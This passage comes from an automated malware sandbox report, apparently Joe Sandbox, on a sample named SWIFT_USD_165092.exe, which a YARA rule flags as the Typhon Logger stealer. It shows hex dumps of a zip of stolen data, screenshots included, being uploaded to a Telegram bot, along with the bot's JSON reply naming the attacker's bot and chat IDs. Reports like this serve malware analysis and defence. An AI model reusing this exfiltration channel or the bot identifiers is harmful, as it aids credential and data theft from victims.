                                                                                      2023-05-22 17:51:45 UTC1023OUTData Raw: 92 e6 bf ce 13 1b c8 13 ba 6b 53 e3 c7 3c c6 a1 dd d0 df 4b 05 ba 10 fe df af 28 9b 1f df 01 98 fc d1 2b 86 e1 86 7b 1f 5d f6 06 f6 dc bb df 8b 2e 8a 3b 57 05 73 b8 5d ae 7e 5f e9 fd bd 79 da 39 71 af 29 c8 c0 5c 6c ff 4b 6f 5a 27 ff f3 fd 05 e3 c1 d1 c1 0d cd b5 56 b3 28 cf 31 72 71 b1 7c 69 41 d9 9e 82 27 1b 88 df f3 20 85 9d ce de 33 15 5f 29 af 53 a4 02 7a b2 a0 8e f1 d7 d9 4e ff f4 65 5f 00 3f b0 e5 e9 e5 7c 47 26 6b 3d 39 e2 8a 13 cb 70 01 ec 76 d7 a3 b7 a6 11 69 65 2e c9 bf 12 9d a4 39 c2 b7 ef b7 ed 2d 76 4e 7f da f1 ec 90 df dc 8f 9b 5b 9f 11 e9 ff 1e 55 4b 05 4c 26 ee 06 bf fc ba 98 25 89 7a 77 d6 51 41 6a d4 a2 fc 5c dd 83 d1 27 62 b9 75 5b 4d e3 ff 52 fc b5 f2 bb a6 54 40 e2 2b 15 58 7c b5 6f f0 6e 81 f4 45 41 e5 a1 8f d1 4a 91 e5 1d 2f e4 ad
                                                                                      Data Ascii: kS<K(+{].;Ws]~_y9q)\lKoZ'V(1rq|iA' 3_)SzNe_?|G&k=9pvie.9-vN[UKL&%zwQAj\'bu[MRT@+X|onEAJ/
                                                                                      2023-05-22 17:51:45 UTC1039OUTData Raw: 3d 8f 58 f5 6a 7b 57 42 b7 89 b9 cf 74 82 57 50 8f 51 44 7d 26 f4 96 93 12 55 4c 01 0d b6 4e 4f 11 af d7 5f fc f9 96 ea 69 57 36 a3 e8 28 e5 b2 0e 39 83 b1 9a 55 74 82 2c 08 f8 2e be 82 57 88 91 c7 32 cf 9c 9c 57 88 8c 0d a2 ad 7e 9f 86 b4 f3 86 2a 0d c2 63 fe 7d ac 67 b6 a1 5c bd 22 50 e4 ac df f2 5b d8 6f 36 26 be d3 f1 31 83 e5 c7 76 97 00 dd 41 df ca 82 8b 4f fa 47 b1 01 c2 5b be 6e f1 e7 e2 92 4b 47 db a7 bf 94 b6 59 f6 aa c3 76 74 8f 6a d2 83 5e ac f9 33 a4 73 d0 2c 9c c4 ff b2 1c 48 1d 33 bf f7 4a ae ee 48 69 aa d1 cf f2 4d 60 99 2e d7 51 d1 c6 90 ee e0 b4 ea e8 6d 19 ce 3f c8 6b d5 34 71 9a cb 5a 50 64 ed da 34 3b ad f8 a7 b7 9b 3e 44 b0 c7 f8 9a 70 09 a8 0d 3f 1d 05 97 12 e0 3f a3 50 e5 e9 f0 5e a9 a4 c0 b5 aa 7d e0 54 15 21 f9 77 1d 3f 0b 25 db
                                                                                      Data Ascii: =Xj{WBtWPQD}&ULNO_iW6(9Ut,.W2W~*c}g\"P[o6&1vAOG[nKGYvtj^3s,H3JHiM`.Qm?k4qZPd4;>Dp??P^}T!w?%
                                                                                      2023-05-22 17:51:45 UTC1055OUTData Raw: 17 31 14 4e 50 8a 18 ca 47 9a 7f b6 75 11 8f e6 83 ec eb 22 ad 1e 7f fe 0e 0d f1 2f fd 6c ea 2a 68 95 86 fe ab fb fd f3 61 9a 53 64 a2 d8 55 69 07 b7 94 04 2b c1 ef 89 9f f5 07 ac 92 32 9b 5e 25 4c 8e 5e 17 2d 90 e2 12 4c 56 b4 31 10 3a 21 91 e4 5e c2 28 bf fe 3d d3 f6 8c c3 6f 33 d9 8d af 9d c4 0c 5b d9 1e 0b b4 f1 74 4e e2 97 44 be 4e 2d 02 c4 a5 d1 48 30 77 01 ca c7 07 61 84 09 40 90 ba af 64 64 45 cf 64 24 09 c0 c2 1b 51 48 9d 48 46 08 64 56 78 69 8d d8 a2 ce a2 ce 93 87 64 b7 6c a4 55 b6 64 5a 63 5f 20 a9 db 32 32 4d e0 26 bc a8 4f ec 68 8e b8 6c 6c 6a 03 e9 1f 4b c9 48 ff a4 10 ec b4 39 1a 58 f6 18 c0 a0 ba 94 8c ea 18 c8 04 c3 cb 3e 00 9e 30 ff 37 9c bd ea 1d 48 7f b7 56 ce 59 08 9a 02 76 1a 74 3c e1 f2 90 44 5c 35 2f 3a d6 05 67 c4 57 86 58 42 99
                                                                                      Data Ascii: 1NPGu"/l*haSdUi+2^%L^-LV1:!^(=o3[tNDN-H0wa@ddEd$QHHFdVxidlUdZc_ 22M&OhlljKH9X>07HVYvt<D\5/:gWXB
                                                                                      2023-05-22 17:51:45 UTC1071OUTData Raw: 4c df dc a5 67 70 e3 23 05 cc cc 89 25 fa 15 e8 8e 9f 65 4c f4 dc 49 28 4c a4 3b a7 03 86 5c 28 04 a6 8f 8d bf 21 1a fb 16 b8 db 1d 0d fc db ab 62 63 84 41 d0 4f eb ff cb 75 96 60 a1 e7 1f c2 af f2 c2 80 b1 18 a3 2d c1 03 08 8b 53 11 18 80 28 1b 0d 52 58 b2 71 ec 50 f5 0c 67 8f 32 1c 03 7e 46 1b e0 da 85 44 2a d7 6f 74 27 ed 0e 35 aa 92 3b 9e 19 dc 89 ee 5c 28 cf e7 60 01 6c 5d a1 79 1a ad 84 ca 40 62 2d 15 b5 06 1e a1 43 7d 69 9f 97 6f 90 87 cf c3 05 01 73 80 83 25 71 c3 24 6d d9 f8 7a 20 18 a0 f7 76 da 43 32 a0 0c ae e7 88 8d e5 04 0b 54 ca 52 16 92 ef 7c 97 98 0a 43 b7 be 5f b6 60 b7 fc 88 a9 95 e1 58 04 de c7 45 fc dc f3 3d 54 0a 6c 06 5d 66 11 0f f1 37 67 c9 51 74 00 e6 a4 29 bb 51 5b 12 ed 6f ac 8b 23 c5 bb bc 99 c2 4b c8 05 9b f8 9b b4 e1 af 98 5f
                                                                                      Data Ascii: Lgp#%eLI(L;\(!bcAOu`-S(RXqPg2~FD*ot'5;\(`l]y@b-C}ios%q$mz vC2TR|C_`XE=Tl]f7gQt)Q[o#K_
                                                                                      2023-05-22 17:51:45 UTC1087OUTData Raw: 21 89 13 e7 9a d9 b6 8a e6 3e a7 9e 97 d6 b2 f5 91 c9 ec 2f 74 cd 31 fc 2e ff 1b a1 1f 83 af 78 94 8d be f9 75 59 a2 6e ba e8 79 e2 44 95 a5 af 0a 5b 80 bf e4 39 79 96 d4 09 4d 0f bd d5 83 b0 8e 8c 9c 93 fc a5 82 49 b3 ad 25 1c 07 3d be 12 e2 97 27 f4 d9 ed fd e8 46 de 1d 0c 8f a8 56 6c ce a8 98 ee bb 15 ea 19 5b 73 7f b2 19 11 e5 ab f9 81 d1 e2 2b af bc a4 d2 d9 43 67 f2 e7 ae 4d e2 a7 4e 98 3a f9 a7 e5 06 92 16 f3 c1 f7 bf 76 69 ad ef 31 de 2c 52 3d 02 d8 0c 4d 77 b7 93 8f 00 85 f0 dc be 16 b9 1f 67 6c 8e 00 d3 0b 3e 3f 85 7b ce 1d 0d fd 1f 50 4b 03 04 14 00 00 00 08 00 63 9e b6 56 a8 00 4a 69 cd 3c 01 00 a7 49 01 00 2e 00 24 00 53 63 72 65 65 6e 73 68 6f 74 73 2f 53 63 72 65 65 6e 73 68 6f 74 5f 32 32 2e 30 35 2e 32 30 32 33 2d 32 31 2e 34 31 2e 35 35
                                                                                      Data Ascii: !>/t1.xuYnyD[9yMI%='FVl[s+CgMN:vi1,R=Mwgl>?{PKcVJi<I.$Screenshots/Screenshot_22.05.2023-21.41.55
                                                                                      2023-05-22 17:51:45 UTC1103OUTData Raw: d9 fc f5 d8 4f f5 6d b7 2c de 3c 94 10 88 cd 22 54 6b 8a 1a 9f 81 5b 3f 7e a0 3a b7 94 74 35 6b ce 5c f8 51 f4 45 19 65 26 86 6d a4 78 62 99 48 24 76 0f 3d 99 bc 32 1d cb f4 1a f5 28 d0 7f f9 98 a2 d7 77 7e a3 4a 27 e8 90 2f 7c bc a1 75 fe a2 86 0e 0f ae b3 7f 61 c1 43 e2 09 2f 2a b5 24 d5 ce 5b be 31 23 ec e8 3d 93 47 c7 82 96 93 c8 3f b0 1e 5d d8 8a a9 59 d6 66 c8 99 a6 aa f5 7b f7 ec 4d 06 bb eb 74 ce 26 15 5d 1a 33 56 7c fd 72 ee 48 2b e9 49 8b 98 e1 2a b7 f1 87 5d 9b a4 bb a0 a4 8e 2d 49 f9 73 d3 fc 0f 1b 6d 01 30 da c3 06 15 bd fa a8 b0 f3 02 d7 eb 4b ec 4f b6 35 27 1a 84 f6 aa cb 84 b7 41 5d 2d 69 7b 62 f7 5b f6 2e a4 e2 e6 83 87 39 29 5e 72 eb 65 4b 2e 67 76 c4 27 1c 5b 5c 73 0e 13 ec 6c 5e c7 64 f1 26 47 62 ee 9b 9c 43 37 e3 bd 0c 03 98 55 9f e7
                                                                                      Data Ascii: Om,<"Tk[?~:t5k\QEe&mxbH$v=2(w~J'/|uaC/*$[1#=G?]Yf{Mt&]3V|rH+I*]-Ism0KO5'A]-i{b[.9)^reK.gv'[\sl^d&GbC7U
                                                                                      2023-05-22 17:51:45 UTC1119OUTData Raw: ff 23 12 85 12 6d 08 52 a7 ea b8 14 12 9d d0 22 75 cf be 02 2d 04 fe 27 51 45 e8 10 22 de 1f ab 09 5f cd 82 28 47 5c 85 e8 01 b1 c5 69 d2 2c 30 6d 88 ee e3 50 e8 a0 58 8e 61 94 dd e7 a2 ab ba 40 a2 c5 11 74 95 58 d4 25 1a 17 ac e9 09 98 60 44 2f cf e2 2b c9 44 74 9e 0d 18 9e 1d 28 9e ca 00 35 7a b5 13 24 3f ae 82 7b 90 51 ae 45 2d 27 53 7c 04 0f 35 8c 72 78 4d b4 2f ab 44 d3 43 bc 24 c9 54 84 d0 4d 8b 58 cd c1 c4 4b e4 9f 4e 5a 66 d1 5f 25 9a 2b 22 35 21 f2 8d 41 c0 b8 b8 0e 4b 46 b9 36 e6 0a de 43 1f d8 fb 61 11 fe 90 81 69 89 f8 1e b3 30 d1 30 11 fd b6 98 a0 5e 53 ba e4 75 89 05 87 46 f9 c2 c6 c2 41 71 79 84 87 2e 50 5b 15 11 52 2c ae 4f 11 1d d5 91 e5 03 a4 28 ae d1 d8 20 ef 33 a5 46 3f 32 64 5d f7 81 f3 a5 7c 60 4f 0f 54 a6 96 93 d8 0a eb d3 e5 c1 ed
                                                                                      Data Ascii: #mR"u-'QE"_(G\i,0mPXa@tX%`D/+Dt(5z$?{QE-'S|5rxM/DC$TMXKNZf_%+"5!AKF6Cai00^SuFAqy.P[R,O( 3F?2d]|`OT
                                                                                      2023-05-22 17:51:45 UTC1135OUTData Raw: 9f 56 d0 41 67 b2 2c 4a 6d d3 46 6a fd 9f 39 ef 2f b5 f5 b4 7a 4f 9e e3 8c 2b 5c b5 4d 1d 49 dc cd c7 e2 87 6f d3 1e dc ee 3d 8a 3f ec 79 1b 96 f5 e7 d5 96 08 0f c0 9a f5 b4 f7 67 64 f2 6f f6 f2 f4 ef 56 4f 59 26 d2 5a 86 55 2d 94 f9 b4 c7 4b 05 f1 6b d3 2a 90 56 68 c9 eb 1e a6 1f e4 53 18 10 99 09 fd 4d bf 53 1e 57 92 91 ec da 60 ce 06 ff 60 c1 23 db a8 8a 69 30 03 34 22 ba fb b4 68 05 53 a7 22 a0 e3 dc ba 5d d4 3c 1c 7c 4d 51 e6 3c a7 46 c5 b7 49 90 4a d8 6e 45 0b 0e 44 22 76 ca 19 eb a7 51 87 4a b1 d9 c1 56 2f 26 55 31 9d 97 30 95 fc 25 42 23 c3 49 8f 4c d5 da 5e 00 f2 0e 50 b5 62 db ba 3b 75 94 b7 51 93 b6 87 f8 1f f8 61 29 80 fb c7 e3 f4 27 c5 cb e6 d6 1d fa 11 17 fc 84 d3 19 9b f3 41 90 46 94 4e f4 0c 81 71 fc 60 2c 2a d9 d0 83 15 24 0a 9f 00 54 77
                                                                                      Data Ascii: VAg,JmFj9/zO+\MIo=?ygdoVOY&ZU-Kk*VhSMSW``#i04"hS"]<|MQ<FIJnED"vQJV/&U10%B#IL^Pb;uQa)'AFNq`,*$Tw
                                                                                      2023-05-22 17:51:45 UTC1151OUTData Raw: ed 75 d8 f6 35 ad db f8 d7 79 ed bb 57 66 5a 64 6b 25 cd d4 f1 23 3d 1f 19 5a ff 73 3b f3 29 e3 91 d1 ae 9f 76 8c f7 f8 9f 1e 8d 71 f3 a4 3f cd 36 67 8f 96 23 f4 ed f8 5e 64 bc b8 56 46 69 fd b1 59 96 8e a5 45 c1 c1 ac d2 f4 3d 3b 10 fd d2 d0 90 d9 b1 f8 54 1a 8c 30 67 c6 03 93 1a 61 02 38 7c 0e 3c 80 53 c3 3c ae 80 9a cb 8d 43 e0 bc f8 87 79 04 70 a7 cb 46 74 d8 70 0a 26 66 40 d0 08 2c 7a 30 40 d0 00 30 ff 8b 21 23 0c 4a 1a 24 80 46 03 6f 23 17 d0 b1 f2 6c 53 58 66 81 9f 20 c2 6f 40 e9 42 c1 79 0b d9 51 f4 98 05 40 1e 96 09 3c dd 63 2c c8 17 9f 9e 4d 8f 3f c8 53 fa 20 cc a5 a5 6b 00 33 a8 d1 4f 3a a0 50 1e 24 f7 c7 7a 85 16 64 15 1b 10 b1 94 80 73 e1 c9 ce 27 ab 77 c8 03 37 e8 d5 64 72 60 9d 68 5a 0f 04 86 a7 ab 46 b8 a4 07 00 cc 14 84 e5 0c 54 d2 03 9f
                                                                                      Data Ascii: u5yWfZdk%#=Zs;)vq?6g#^dVFiYE=;T0ga8|<S<CypFtp&f@,z0@0!#J$Fo#lSXf o@ByQ@<c,M?S k3O:P$zds'w7dr`hZFT
                                                                                      2023-05-22 17:51:45 UTC1167OUTData Raw: 82 0b 88 7b 84 6c 8e 10 e1 a7 a1 a9 44 ec 37 8b 3e 52 21 3b d7 38 44 4c 1e 3e 23 26 a1 be 48 43 4b c7 79 e9 32 17 37 8f a8 98 b8 c4 d5 6b d7 e5 6e c1 e4 15 14 95 e0 9a 5a b7 b5 75 74 ef e8 99 9a 99 df b7 b0 b4 b2 7e f4 d8 c9 d9 c5 d5 cd fd b9 8f af df 8b 97 af d0 61 e1 11 91 51 d1 31 b1 71 69 e9 19 98 cc ac ec 9c d7 c5 6f 4b 4a cb ca 2b de bd ff 54 57 df d0 d8 d4 fc f9 4b 57 77 4f 6f 5f ff b7 81 c1 89 c9 a9 e9 99 d9 b9 ef f3 0b eb 1b 9b 5b db 3b bb 7b fb 07 27 71 e1 81 71 fe fe fa 4f e3 a2 00 e3 3a 75 fa 34 fe 69 c2 93 b8 f0 4e b9 9c 6c 40 71 fa 0c ab 10 01 e5 0d 04 e1 3d c7 0b 6c c2 4f 89 20 37 43 53 8b 3e 12 b3 8b 20 d7 a8 4c 1e 76 92 50 73 88 4e 70 ae 9f 84 f6 23 b2 ff 59 60 cf fe 8f 22 fb 23 b0 3f e3 1a 04 48 f1 f1 c0 93 87 4f 01 40 81 f5 2b 42 ca ca
                                                                                      Data Ascii: {lD7>R!;8DL>#&HCKy27knZut~aQ1qioKJ+TWKWwOo_[;{'qqO:u4iNl@q=lO 7CS> LvPsNp#Y`"#?HO@+B
                                                                                      2023-05-22 17:51:45 UTC1183OUTData Raw: b4 54 72 6f 3a 08 75 7e c8 b5 3e e5 3c 0e b8 5b 5d e7 a1 58 ad 30 ed b8 a7 13 e1 fa 70 3f df 53 d5 de f5 a0 70 c7 e6 d4 f4 28 8d d4 b2 4f 2e 8a d0 73 8e 39 c8 26 c5 bf 71 4d 61 6d 52 fd 5c 8c c5 a1 1d a9 95 38 41 3b 7f b2 e3 e9 39 69 e1 eb 3a 92 13 f1 b5 6f f6 d0 7d 73 87 ea 87 22 f7 71 c0 56 ed db fd 51 23 c4 8b e1 d5 84 a9 a1 6b 05 74 8f 87 4d 79 0b 05 a3 27 dd 45 e2 6c 75 b7 d4 f7 94 a1 0b 99 38 60 86 10 6c 6f 7a cc e7 67 37 8f c8 52 5a 77 0a 4b dd a2 9d 57 77 82 05 2d e2 63 86 57 87 8e ae 2d 06 0d e4 e1 80 5f 37 d6 c1 b2 a9 ce ed 5d bc 99 bc 6c 6c bd 29 b0 3c b6 cc 64 d4 2e 21 74 6d ac 7c ef 51 3f e3 5b dd ee c0 5c 39 b5 ea da 43 ad db 3a ee 22 fd 59 db bd 09 b2 d6 ae ee d9 1c 59 84 85 f9 96 47 c7 1f de 17 bb d3 95 52 0d b1 d2 5e cb 7b d3 98 c4 91 37
                                                                                      Data Ascii: Tro:u~><[]X0p?Sp(O.s9&qMamR\8A;9i:o}s"qVQ#ktMy'Elu8`lozg7RZwKWw-cW-_7]ll)<d.!tm|Q?[\9C:"YYGR^{7
                                                                                      2023-05-22 17:51:45 UTC1199OUTData Raw: a9 da 13 58 aa d2 28 5f 5d 28 d8 16 68 22 c8 00 68 70 58 d7 f9 5a f6 e6 11 ec 03 07 41 d0 1b 3c e8 f1 ab f3 c5 af d8 d7 ce 21 0b 21 b3 38 c9 7c 3a b9 22 dc f7 37 74 22 c9 2a 86 ea 2e 04 45 12 3c 9c c5 c4 75 83 72 d3 63 ee 01 65 b7 29 3a f8 ee bf de 23 6b eb 5f 65 51 75 63 6c b3 c9 26 63 29 f7 a5 5b ec 29 cc 27 e2 d5 a1 ec fb 14 f1 36 c4 16 0f fa 38 29 1e 35 a0 40 98 9b 67 bc 75 5c 70 f3 3e 7b 56 84 2c c9 fb 36 82 e0 ea fd 15 0e 1d 43 d2 4b 98 91 91 cf 65 21 ed e1 6b 4f cc 8f 5f ed 9e 2e 61 3e 7a c7 0d f5 7c 27 bb 61 5c 5f 69 8a 26 ff 6a 14 b6 d1 c3 ec 1b 34 35 76 c1 fe ba 88 80 1f cd 40 99 1f 8e da dc 95 65 7c b5 66 3e bd a0 d3 72 1e 42 e8 49 d4 26 39 67 9c 01 3e cc e7 ee 38 f1 2b fc 3a 17 1f d5 94 5b 69 9e 28 31 b1 0e 25 6a a1 96 1a 52 7f bd 69 20 bc 29
                                                                                      Data Ascii: X(_](h"hpXZA<!!8|:"7t"*.E<urce):#k_eQucl&c)[)'68)5@gu\p>{V,6CKe!kO_.a>z|'a\_i&j45v@e|f>rBI&9g>8+:[i(1%jRi )
                                                                                      2023-05-22 17:51:45 UTC1215OUTData Raw: 95 2c 80 86 e6 44 5a ff 08 51 08 f0 ba 2a c4 fd 80 ca e7 45 52 f6 d3 58 47 a2 e1 9e a9 24 27 b9 58 16 98 9c 4d 9d bc 04 08 17 73 e2 49 2f ab aa 06 6a c2 6c 74 bb 04 0f 11 a1 05 6f 00 2c 8a 59 3b 5f 69 d1 bf 5a 4f a0 25 f7 08 f4 eb 55 80 4a 22 59 21 1e e4 62 28 44 b8 67 fa eb d6 12 40 c5 a9 64 49 0f fb c5 2b 70 5e e8 15 7f 2a 5d a3 b9 5a 4c 56 2e ed 53 40 f9 28 61 14 b1 fe 89 c1 b5 06 77 79 d6 2b 56 a7 22 85 f0 bf 52 3f 77 36 65 44 9c 94 d3 ef 1a b6 fa a6 e1 d9 50 eb f0 7d 20 b3 d6 f2 ca b1 62 e3 f4 b9 a3 15 ea 61 6b 33 48 e4 f8 ef e1 f1 0f d9 a3 d2 19 8e db 75 0d c3 49 92 e7 86 e7 c7 a4 1b ef bf f8 9d ab 83 b1 2d 7d 74 40 47 e0 16 ed 68 48 00 26 a9 97 f4 36 d3 f2 db b7 26 0b 5b d1 96 41 9c b5 ee a9 ea f8 a9 84 ef 21 0f 73 42 78 de be 67 a5 25 0e 1d 15 68
                                                                                      Data Ascii: ,DZQ*ERXG$'XMsI/jlto,Y;_iZO%UJ"Y!b(Dg@dI+p^*]ZLV.S@(awy+V"R?w6eDP} bak3HuI-}t@GhH&6&[A!sBxg%h
                                                                                      2023-05-22 17:51:45 UTC1231OUTData Raw: 2f cf 97 f8 14 63 5f d1 a6 38 d6 ba 5f 0a b1 79 da 95 62 32 53 df e5 b8 bc 5b 1c 9f 94 de 85 9d a9 4c bd 41 05 48 b7 77 2e 29 5e ad 4b ef 57 4f e8 08 13 f2 59 f2 4e 64 d3 1d ab 19 32 16 7a be 19 b7 7c f9 4d 8a c3 56 e8 dd a0 a2 ed b3 53 d7 9d 46 e6 97 bd 65 f2 2a 59 be 98 af 64 cf 8e d5 9c 1a 8f f9 a8 51 12 24 43 4a b1 b6 98 5c d0 be e0 9c 6c 70 e8 e6 1a 47 db ab 47 d3 fc 1f da 9a 19 94 02 be 04 9e e0 b4 1f 3b 16 ac 7a 12 a5 b0 66 db 78 f8 7b d2 f7 b8 23 de 72 21 5c 5a 43 75 53 33 57 ce 78 f1 58 e6 1d 57 ab 1d df dd 49 dc 19 42 07 0f fc 72 94 4a 26 4d 77 df c8 a5 70 e6 50 1a d4 87 4b 3e d9 2e 7b aa 39 e0 d5 e5 79 22 6f 79 8d 6b 4a 6c 15 95 de 85 07 bb dc ec ee ec 86 5d 3a ed a6 30 dc c9 e8 14 d4 db c2 51 fb bd 65 ab ba 2b e0 bd df d6 f1 78 db 0b cd b9 55
                                                                                      Data Ascii: /c_8_yb2S[LAHw.)^KWOYNd2z|MVSFe*YdQ$CJ\lpGG;zfx{#r!\ZCuS3WxXWIBrJ&MwpPK>.{9y"oykJl]:0Qe+xU
                                                                                      2023-05-22 17:51:45 UTC1247OUTData Raw: 04 04 99 bf 2e 9c 28 a1 64 93 bb d5 e9 95 8c 72 9f fd 27 dc d6 eb 8c 53 e7 1d 2a 12 ca ae c1 67 ba c4 71 dd ee d0 1c a8 fa 49 67 16 a7 29 7f 50 09 2f 0c 88 8e 12 e4 fe 80 f4 40 de 1b 94 ed 26 b8 6e 31 68 0f 89 8f 9a c4 2c a3 67 dc dc cd fd 98 da b5 15 5e 5d 02 b8 df 8b 7f f1 5a da dc b9 a5 8d 37 55 c1 6b ec cd 74 19 8f 5e db f5 b3 a9 eb b3 6f 4b a8 43 78 3c af 4b d0 ea 12 b9 36 c8 73 57 36 b5 32 4c 2a af 28 9a 99 70 fd f7 ad 92 17 2c 10 20 f6 eb e0 de ab 4e 83 5f ab f7 c2 79 e8 a0 8e 34 b4 4c 8e b7 79 12 67 6f 0a ac e1 83 bf 0f 09 0b a5 40 24 7c af 3a 0e 64 d9 73 87 9c 05 06 cb bb 19 fe 7e a5 5a 36 6f 1a 88 36 5b d0 7a 95 5a ff 80 d5 b4 20 11 6b 40 d6 35 c6 1f f1 1c 40 c3 1c af 92 bd d4 98 c3 9f 56 7d 41 44 73 c1 43 91 13 45 01 ad 9b 76 8e 9d 2f d9 3e 25
                                                                                      Data Ascii: .(dr'S*gqIg)P/@&n1h,g^]Z7Ukt^oKCx<K6sW62L*(p, N_y4Lygo@$|:ds~Z6o6[zZ k@5@V}ADsCEv/>%
                                                                                      2023-05-22 17:51:45 UTC1263OUTData Raw: 6b 49 77 a9 e2 cb 74 10 7f d5 c9 4a 13 f5 a4 b0 92 17 ba e4 a8 eb 5f d3 9c f5 dd 87 73 16 ee ca 93 0b db 04 72 f0 3f e5 6e 1d fc 4b fc 5a df 8c 89 ca f9 d2 e7 c8 61 23 ee 68 86 57 30 cb ac be 81 31 cf 24 1b 69 d9 fc bc be 30 4b 29 a8 f5 08 92 7c 79 bb 32 29 e4 e3 8b 07 27 ce af 20 51 da 4f 6e d1 4e 32 15 df be 11 28 45 b2 af 30 5c cb 51 b0 f6 e7 34 e1 0a 4c fb a3 ff da 89 c0 a1 37 ea f5 d5 3f b6 ca d1 bb 4c 08 5b e6 88 38 08 77 df 1e b4 7c 57 a7 bb 27 b8 f7 32 39 b8 34 cc ea 8f 6c c2 a7 d7 37 43 ce 87 ce a5 51 9b 47 8d 77 4a 44 d2 45 ae a7 fc 66 1b 14 df 4e fe ce aa 95 de fe 48 7f b2 5d f1 4f 2f 1d f4 c3 73 24 ac db 85 0e ea 20 ac 7b 13 fa 0d ef 89 1b 99 5b 7d 2b 3c 0c 68 2e 76 34 b1 a9 4f 77 50 8a 42 b7 4c 4e e7 dc e3 30 8e 30 26 7c 5e 69 59 dd 76 3e f7
                                                                                      Data Ascii: kIwtJ_sr?nKZa#hW01$i0K)|y2)' QOnN2(E0\Q4L7?L[8w|W'294l7CQGwJDEfNH]O/s$ {[}+<h.v4OwPBLN00&|^iYv>
                                                                                      2023-05-22 17:51:45 UTC1279OUTData Raw: ab 76 f7 7f 2c 75 24 b8 3d cc 39 90 dc 13 6f aa f7 80 7a f9 0b c5 91 9f 46 31 24 99 e3 ad fd 17 ee f0 07 fc a8 43 e0 06 76 83 25 8e c6 68 b1 ed e1 ff 15 3b ab 3b 7c e0 2c 9e 86 1f 88 f3 8f f5 65 fd 2e f7 14 14 a0 2a aa 34 ba 82 73 02 d3 1c 61 3e 2c 33 6c 25 2e 0c 93 2a 0b 8d ed da bf 27 6c 46 bc d7 6e ad 41 25 92 1f fa 40 8c 65 4f 69 b9 28 8b 09 5c 25 75 84 34 05 d1 34 b3 ee 89 cf 37 29 7a 51 6d ff c8 ed a0 77 b5 ac c7 b5 ba 09 52 a1 eb 3b 21 df 34 1e de 6b bc 3e c2 8b e0 eb 61 79 78 45 ee 4a be ff 61 92 8d 10 e4 48 98 00 7e 1e 6c bf 27 ed 8d 20 36 0f be 38 e1 a8 10 30 55 33 24 18 49 db 33 7a b2 26 ab 68 ec 4d 4c 67 8c 7f 25 72 e1 47 96 18 75 aa 30 af dd 59 eb 2e 41 eb ce 7a dd 41 4a 91 08 40 84 85 f4 f4 f9 6e ee 57 ff 1f 24 be dd a0 05 36 6f 76 c1 42 1a
                                                                                      Data Ascii: v,u$=9ozF1$Cv%h;;|,e.*4sa>,3l%.*'lFnA%@eOi(\%u447)zQmwR;!4k>ayxEJaH~l' 680U3$I3z&hMLg%rGu0Y.AzAJ@nW$6ovB
                                                                                      2023-05-22 17:51:45 UTC1295OUTData Raw: fa 7e 01 d7 db 4b 8a e3 0b 6a 4a 14 b9 65 24 d6 8b 25 98 d1 9e 03 a9 3c 6a b7 8f 80 fe fe c3 ea 8e 9f bd 25 e5 1b 35 1d bd 6e 9f 3b 06 6e ff ee 1b 45 ce f5 4e 7e c4 78 6b 9e 34 ab 30 9c b9 72 a9 2a 3a f4 f9 8b 7b d2 1f 95 83 02 17 44 dc 52 28 4a b0 66 f5 65 af b5 60 56 31 d5 4f 46 2a 68 64 ef 3d 79 ed d2 72 d1 78 de 41 86 3b 4f 55 aa 78 71 f7 9d c4 87 82 23 a0 f0 08 68 5b a7 36 a5 fb b9 35 ce d9 73 bd 65 45 5f 2b 7e 9c 3a 99 8c 8e a0 ea 90 2e c8 d1 7f 8a f6 db c8 a7 df fa 17 25 d8 5d 68 a6 5f 7d ff fa 91 8f 62 b1 d3 86 5f 6d 06 af 84 8f 6c 3a d1 35 6c a4 ba f9 c2 f9 d6 ad 73 b1 24 24 1d a4 a4 75 29 8e 31 f5 13 56 99 17 59 62 df c0 76 8f 00 83 23 20 99 29 6f 60 e3 c0 45 b2 95 f6 22 cf b7 dd c0 6d 05 49 eb 8f ce 6d f7 de 29 dd 2c 38 cb 97 f1 c8 85 44 41 9e
                                                                                      Data Ascii: ~KjJe$%<j%5n;nEN~xk40r*:{DR(Jfe`V1OF*hd=yrxA;OUxq#h[65seE_+~:.%]h_}b_ml:5ls$$u)1VYbv# )o`E"mIm),8DA
                                                                                      2023-05-22 17:51:45 UTC1309OUTData Raw: 0d 0a 2d 2d 36 35 30 35 35 63 61 66 2d 66 34 36 37 2d 34 32 64 31 2d 39 35 36 39 2d 61 64 32 34 30 32 30 30 65 37 31 62 2d 2d 0d 0a
                                                                                      Data Ascii: --65055caf-f467-42d1-9569-ad240200e71b--
                                                                                      2023-05-22 17:51:45 UTC1309INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 22 May 2023 17:51:45 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 516
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":730,"from":{"id":5869127049,"is_bot":true,"first_name":"MMtrade Bot","username":"mmtraded_bot"},"chat":{"id":1689002171,"first_name":"MM","last_name":"Trade","username":"mmtrade_001","type":"private"},"date":1684777905,"document":{"file_name":"C_UsersuserAppDataLocalTemp22_05_02023_21_42_13=user@12875.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIC2mRrq7HXldCr1R5s3lnlqqxBu_IZAAIEEAAClttYUygT05aYGSPGLwQ","file_unique_id":"AgADBBAAApbbWFM","file_size":553940}}}


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:19:49:29
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      Imagebase:0x710000
                                                                                      File size:2164736 bytes
                                                                                      MD5 hash:22BA147ED50FF44941FE486426432115
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_TyphonLogger, Description: Yara detected Typhon Logger, Source: 00000000.00000002.399919891.0000000003C59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
